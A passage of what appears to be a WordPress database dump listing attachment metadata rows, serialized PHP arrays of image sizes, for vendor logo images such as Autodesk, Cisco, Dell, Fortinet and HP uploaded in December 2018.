:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1605,1669,'_wp_attached_file','2018/12/Autodesk.jpg'),(1606,1669,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:20:\"2018/12/Autodesk.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Autodesk-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"Autodesk-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"Autodesk-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"Autodesk-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:20:\"Autodesk-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:20:\"Autodesk-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:20:\"Autodesk-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:18:\"Autodesk-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1607,1670,'_wp_attached_file','2018/12/Barracuda-Logo.jpg'),(1608,1670,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:26:\"2018/12/Barracuda-Logo.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Barracuda-Logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Barracuda-Logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"Barracuda-Logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"Barracuda-Logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"Barracuda-Logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"Barracuda-Logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:26:\"Barracuda-Logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:24:\"Barracuda-Logo-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1609,1671,'_wp_attached_file','2018/12/Bitdefender-logo.jpg'),(1610,1671,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:28:\"2018/12/Bitdefender-logo.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"Bitdefender-logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"Bitdefender-logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"Bitdefender-logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"Bitdefender-logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:28:\"Bitdefender-logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:28:\"Bitdefender-logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:28:\"Bitdefender-logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:26:\"Bitdefender-logo-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1611,1672,'_wp_attached_file','2018/12/Cisco-Logo.jpg'),(1612,1672,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:22:\"2018/12/Cisco-Logo.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Cisco-Logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Cisco-Logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Cisco-Logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Cisco-Logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"Cisco-Logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"Cisco-Logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:22:\"Cisco-Logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1613,1673,'_wp_attached_file','2018/12/Dell-Logo.jpg'),(1614,1673,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:21:\"2018/12/Dell-Logo.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Dell-Logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Dell-Logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"Dell-Logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"Dell-Logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"Dell-Logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"Dell-Logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:21:\"Dell-Logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1615,1674,'_wp_attached_file','2018/12/Dropbox-logo.jpg'),(1616,1674,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:24:\"2018/12/Dropbox-logo.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Dropbox-logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Dropbox-logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Dropbox-logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Dropbox-logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"Dropbox-logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"Dropbox-logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"Dropbox-logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"Dropbox-logo-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1617,1675,'_wp_attached_file','2018/12/Epson-Logo.jpg'),(1618,1675,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:22:\"2018/12/Epson-Logo.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Epson-Logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Epson-Logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Epson-Logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Epson-Logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"Epson-Logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"Epson-Logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:22:\"Epson-Logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:20:\"Epson-Logo-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1619,1676,'_wp_attached_file','2018/12/ergotron-logo.jpg'),(1620,1676,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:25:\"2018/12/ergotron-logo.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"ergotron-logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"ergotron-logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"ergotron-logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"ergotron-logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"ergotron-logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"ergotron-logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"ergotron-logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1621,1677,'_wp_attached_file','2018/12/Fortinet-Logo.jpg'),(1622,1677,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:25:\"2018/12/Fortinet-Logo.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Fortinet-Logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Fortinet-Logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Fortinet-Logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Fortinet-Logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"Fortinet-Logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"Fortinet-Logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"Fortinet-Logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"Fortinet-Logo-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1623,1678,'_wp_attached_file','2018/12/GoToMeeting.jpg'),(1624,1678,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:23:\"2018/12/GoToMeeting.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"GoToMeeting-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"GoToMeeting-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"GoToMeeting-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"GoToMeeting-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"GoToMeeting-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:23:\"GoToMeeting-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:23:\"GoToMeeting-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1625,1679,'_wp_attached_file','2018/12/GoToTraining.jpg'),(1626,1679,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:24:\"2018/12/GoToTraining.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"GoToTraining-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"GoToTraining-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"GoToTraining-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"GoToTraining-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"GoToTraining-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"GoToTraining-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"GoToTraining-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1627,1680,'_wp_attached_file','2018/12/GoToWebinar.jpg'),(1628,1680,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:23:\"2018/12/GoToWebinar.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"GoToWebinar-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"GoToWebinar-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"GoToWebinar-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"GoToWebinar-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"GoToWebinar-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:23:\"GoToWebinar-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:23:\"GoToWebinar-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1629,1681,'_wp_attached_file','2018/12/HP-Logo-V2.jpg'),(1630,1681,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:22:\"2018/12/HP-Logo-V2.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"HP-Logo-V2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"HP-Logo-V2-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"HP-Logo-V2-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"HP-Logo-V2-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"HP-Logo-V2-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"HP-Logo-V2-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:22:\"HP-Logo-V2-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4: